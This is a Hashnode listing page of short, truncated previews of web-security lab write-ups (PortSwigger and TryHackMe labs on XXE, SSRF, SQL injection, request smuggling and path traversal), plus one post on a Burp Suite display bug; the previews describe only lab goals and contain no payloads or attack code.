J3bitokjebitok.hashnode.dev·Jan 11, 2025The Advent of Cyber: Day 14: Certificate mismanagement - Even if we're horribly mismanaged, there'll be no sad faces on SOC-mas! (TryHackMe)In this article, we’ll cover Certificate mismanagement - Even if we're mismanaged, there'll be no sad faces on SOC-mas! write-up as the Day 14 challenge of the Advent of Cyber event challenge. It involved using Portswagger’s Burp Suite to take advant...portswigger
J3bitokjebitok.hashnode.dev·Jan 11, 2025The Advent of Cyber: Day 5: XXE - SOC-mas XX-what-ee? (TryHackMe)In this article, we’ll cover the XXE - SOC-mas XX-what-ee? write-up as the Day 5 challenge of the Advent of Cyber event challenge. It was interesting to navigate Web Security for an e-commerce gifting site using PortSwigger’s XML external entity (XXE...xxe
Ohekpeje Joel Odeyjoelodey.hashnode.dev·Nov 17, 2024Lab: Broken brute-force protection, multiple credentials per requestLab Scenario: Our objective is to understand and exploit a web application's broken brute-force protection, where the login credentials are submitted in JSON format. By manipulating the request to submit multiple credentials, we aim to bypass the pro...1 like·39 readsPortSwigger Authentication Labswebsecurity
Ohekpeje Joel Odeyjoelodey.hashnode.dev·Nov 8, 2024Lab: Exploiting XXE to perform SSRF attacksLab Scenario: Our mission is to exploit XXE through a web application's "Check stock" feature, ultimately performing SSRF attacks to access sensitive information from a metadata endpoint. By intercepting and manipulating a POST request, we intend to ...1 likePortSwigger XML external entity (XXE) injectionxxe
Ashlesh singh chouhanunlockingadminaccess.hashnode.dev·Oct 17, 2024The Power of SQL Injection: From Product Filters to Admin AccessIn this post, we'll explore how to exploit a SQL injection vulnerability in a non-Oracle database. SQL injection is one of the most dangerous security risks and can lead to unauthorized access to sensitive data. By following this lab, you'll learn ho...admin access
Aditya Uniyaladityauniyal.hashnode.dev·Oct 5, 2024Information Disclosures Lab (Fast recap)Lab1: Information disclosure in error messages It gives information about the version if we put the input parameter wrong. Lab2: Information disclosure on debug page We can just check the source code there it is mentioned about the path to a php f...#cybersecurity
Shubham Sutarishubh.hashnode.dev·Sep 23, 2024Burp Suite Cursor displayed offset to the right of text in high DPIWhen I try to type in the textbox of Port swigger Burp (all recent versions, 1.5.20 or latest versions), the cursor shows up at the right place, but things are inserted as if the cursor is somewhere else. It's frustrating to try to edit a payload whe...71 readsError Solution2Articles1Week
Ohekpeje Joel Odeyjoelodey.hashnode.dev·Aug 24, 2024Lab: HTTP request smuggling, basic TE.CL vulnerabilityLab Scenario: Our mission is to explore and exploit a simulated web application's vulnerability to HTTP request smuggling. We'll use the TE.CL technique to manipulate the transfer encoding and content length, revealing potential security weaknesses. ...10 likes·32 readsPortSwigger HTTP request smuggling Labsportswigger
Dh89dh89.hashnode.dev·Aug 16, 2024Lab*5-Path TraversalLaboratorio 5 Continuamos con los laboratorios de Path-Traversal de Portswigger en este caso el quinto laboratorio. Resolucion Observamos la clásica web de ventas de productos que solemos observar en los laboratorios de Portswigger. Como leemos en ...Path TraversalBurpsuite
Dh89dh89.hashnode.dev·Aug 14, 2024Lab*4-Path TraversalLaboratorio 4 Este es el laboratorio 4 de Portswigger, vamos a continuar los laboratorios sobre Path-Traversal. Resolucion Vemos la típica página web ya habitual en los laboratorios de Portswigger sobre la venta de ciertos artículos. Vemos en la de...Path TraversalBurpsuite